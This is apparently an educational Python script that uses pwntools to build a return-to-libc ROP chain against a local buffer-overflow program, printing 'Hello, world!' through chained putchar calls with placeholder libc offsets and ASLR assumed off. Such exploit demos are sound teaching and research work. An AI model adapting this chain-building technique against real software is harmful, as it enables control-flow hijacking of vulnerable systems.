# Example implementation to produce a ROP chain for a vulnerable program
# and print 'Hello, world!'.
# The program takes its input as an argument and has a buffer overflow vulnerability.
# We are using the CTF framework 'pwntools' https://github.com/Gallopsled/pwntools
# We are expecting that ASLR is disabled. Bypassing the NX bit.
from pwn import log, context
from pwnlib.tubes.process import process
from pwnlib.util.packing import p32, pack
from pwnlib.exception import PwnlibException
context(arch='i386', os='linux')  # pwntools defaults for p32/pack: 32-bit little-endian Linux
# NOTE this might vary based on machine
# Base address of libc inside the target process. 0x00000000 is a placeholder;
# a fixed value is only meaningful because the demo assumes ASLR is disabled.
libc_entry = 0x00000000
# NOTE that you might have different offsets, depending on libc version
# and compiler settings
# All offsets below are relative to libc_entry and are placeholders here.
offset_ppr = 0x00000000 # pop/pop/ret gadget (assigned but not used by main)
offset_pr = 0x00000000 # pop ebx;ret
offset_exit = 0x00000000  # exit() in libc
offset_putchar = 0x00000000  # putchar() in libc
# 0xf7e6740f  -- stray value left in the source; presumably an example address,
# but its meaning is not stated anywhere in this file — confirm before reusing it
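def _build_payload(text):
    """Build the argv payload that prints *text* one character at a time.

    Layout (every address is a 32-bit little-endian value computed from the
    module-level ``libc_entry`` and ``offset_*`` placeholders):

        padding   -- 32 NOP bytes (presumably the distance to the saved
                     return address; confirm against the target binary)
        per char  -- putchar@libc, pop/ret gadget, the character packed as
                     a 32-bit int with its zero bytes rewritten to 0xff
        tail      -- pop/ret gadget, a dummy value, exit@libc

    The 0xff rewrite exists because the payload is delivered through argv,
    which cannot carry NUL bytes; putchar converts its argument to unsigned
    char, so the upper bytes are irrelevant. An *address* that contains a
    zero byte cannot be fixed up this way, which is why the caller expects
    PwnlibException from process().

    Args:
        text: the string to print.

    Returns:
        bytes: the complete payload.
    """
    pad_char = b"\x90"
    pad_size = 32
    pop_ret = p32(libc_entry + offset_pr)

    chain = [pad_char * pad_size]
    for char in text:
        chain.append(p32(libc_entry + offset_putchar))
        # Return target after putchar: pop its argument off the stack, then ret.
        chain.append(pop_ret)
        # pack(value, 32, 'little', False) -> 32-bit unsigned little-endian.
        chain.append(pack(ord(char), 32, 'little',
                          False).replace(b"\x00", b"\xff"))
    chain.append(pop_ret)
    chain.append(p32(0xffffffff))  # dummy value; exit() never returns to it
    chain.append(p32(libc_entry + offset_exit))
    return b"".join(chain)


def main():
    """Run the demo: build the chain, save a copy, launch the target.

    Side effects:
        * writes the raw payload bytes to ``payload.txt`` in the working dir
        * spawns ``../vuln_progs/Overflow`` with the payload as argv[1]
        * logs whatever the target printed within 0.5 s

    Prints "Nulls in arguments." when pwntools refuses to start the process
    because some address in the chain contains a zero byte (the 0x00000000
    placeholders above always trigger this). ASLR on the target would also
    break the demo, since libc_entry is a fixed constant.
    """
    hello = "\nHello, world!\n\n"  # printed via one putchar call per character
    payload = _build_payload(hello)

    # Keep a copy so the target can be run by hand without this script.
    # Binary mode and raw bytes are required: str(payload) would write the
    # Python repr (b'\x90...'), not the payload, and the previous f.close
    # (no parentheses) never closed the file.
    with open("payload.txt", "wb") as f:
        f.write(payload)

    # The C program receives the payload as its argument.
    target = None
    try:
        target = process(["../vuln_progs/Overflow", payload])
        log.info(target.recvall(timeout=0.5))
    except PwnlibException:
        print("Nulls in arguments.")
    finally:
        if target is not None:
            target.close()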
if __name__ == "__main__":
    # Entry point when run as a script; importing the module runs nothing.
    main()